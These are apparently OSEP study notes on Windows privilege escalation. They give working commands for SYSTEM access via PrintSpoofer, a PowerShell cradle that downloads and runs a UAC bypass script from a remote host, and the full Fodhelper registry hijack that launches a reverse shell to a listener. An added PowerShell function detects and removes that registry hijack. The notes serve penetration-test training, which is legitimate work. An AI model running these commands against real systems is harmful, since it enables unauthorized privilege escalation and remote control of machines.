OSEP Notes
Privilege Escalation


Last updated 2 years ago

SeImpersonatePrivilege

PrintSpoofer64.exe -i -c powershell

Run the above command to obtain a SYSTEM-level PowerShell session when the current token holds SeImpersonatePrivilege.

UAC

iex(new-object net.webclient).downloadstring('http://192.168.1.1/uacbypass.ps1');alt
  • Fodhelper UAC Bypass

Use these commands in a PowerShell session:

New-Item "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force

New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force

Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell.exe -exec bypass -c C:\Windows\Tasks\reverse-shell.exe" -Force

Start a listener to catch the shell, then execute fodhelper.exe:

C:\Windows\System32\fodhelper.exe
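The registry hijack above leaves a distinctive footprint: a normal user profile has no ms-settings handler under HKCU, so the presence of that key with an empty DelegateExecute value is the indicator to look for after an engagement (and what a blue team will hunt for). The following PowerShell function is an added example, not part of the original notes or the PrintSpoofer/UACBypass tooling; the function name Test-FodhelperHijack and the -Remediate switch are my own, and the key path is the one used in the commands above.

```powershell
# Added example: audit (and optionally remove) the per-user ms-settings handler
# that fodhelper.exe consults. Run in the context of the user being checked,
# since HKCU is per-user. The system default handler lives under HKLM and is
# not touched by -Remediate.
function Test-FodhelperHijack {
    [CmdletBinding()]
    param(
        [switch]$Remediate   # assumed switch name: remove the override when present
    )

    $keyPath = 'HKCU:\Software\Classes\ms-settings\shell\open\command'

    if (-not (Test-Path -Path $keyPath)) {
        return [pscustomobject]@{
            Present         = $false
            Command         = $null
            DelegateExecute = $false
            Removed         = $false
        }
    }

    # Get-ItemProperty exposes the key's default value as the "(default)" property.
    $props   = Get-ItemProperty -Path $keyPath
    $command = $props.'(default)'

    # DelegateExecute is only present when the hijack has been staged.
    $delegate    = Get-ItemProperty -Path $keyPath -Name DelegateExecute -ErrorAction SilentlyContinue
    $hasDelegate = $null -ne $delegate

    $removed = $false
    if ($Remediate) {
        # Remove the whole ms-settings class override, not just the command subkey.
        Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force
        $removed = $true
    }

    [pscustomobject]@{
        Present         = $true
        Command         = $command
        DelegateExecute = $hasDelegate
        Removed         = $removed
    }
}

# Report only:
Test-FodhelperHijack

# Report and clean up after the bypass has been exercised:
# Test-FodhelperHijack -Remediate
```

A result with Present = True and DelegateExecute = True, where Command points at an executable outside the normal Windows directories, is the exact state produced by the three commands above; running with -Remediate restores the profile to its default state once the shell has been caught.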

AccessChk

accesschk.exe "currentuser" C:\Windows -wus
accesschk.exe -ucqv servicename

SeatBelt

Seatbelt.exe -group=user
PrintSpoofer
UACBypass.ps1